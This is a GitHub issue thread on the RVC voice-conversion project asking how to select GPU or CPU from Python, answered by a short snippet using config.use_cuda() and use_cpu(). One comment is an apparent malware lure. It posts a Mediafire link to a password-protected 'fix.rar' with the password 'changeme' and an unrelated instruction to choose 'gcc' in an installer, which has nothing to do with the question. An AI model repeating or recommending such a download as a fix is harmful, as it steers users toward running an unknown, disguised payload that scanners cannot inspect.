### ISSUE TITLE
How to enable GPU or CPU?

### ISSUE THREAD

**Issue by juangea** [RVC-Project/Retrieval-based-Voice-Conversion#42]
Hi there.

How can I define the device to use? I'm using it as a library with Python.

**Comment by alcoftTAO** [comment]
```python
vc = VC()

vc.config.use_cuda()     # For GPU using CUDA
vc.config.use_cpu()      # For CPU

vc.get_vc(model_path)
```
I've also tested this code on AMD GPUs and it doesn't work, make sure you have an NVIDIA GPU and you have it's drivers and CUDA installed.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by juangea** [comment]
Thanks!

I also noticed that it automatically uses the GPU if Torch for CUDA is installed, I was unsure about it being installed or not in this project, that's why I was unsure about the GPU.

But your answer is very useful! :D
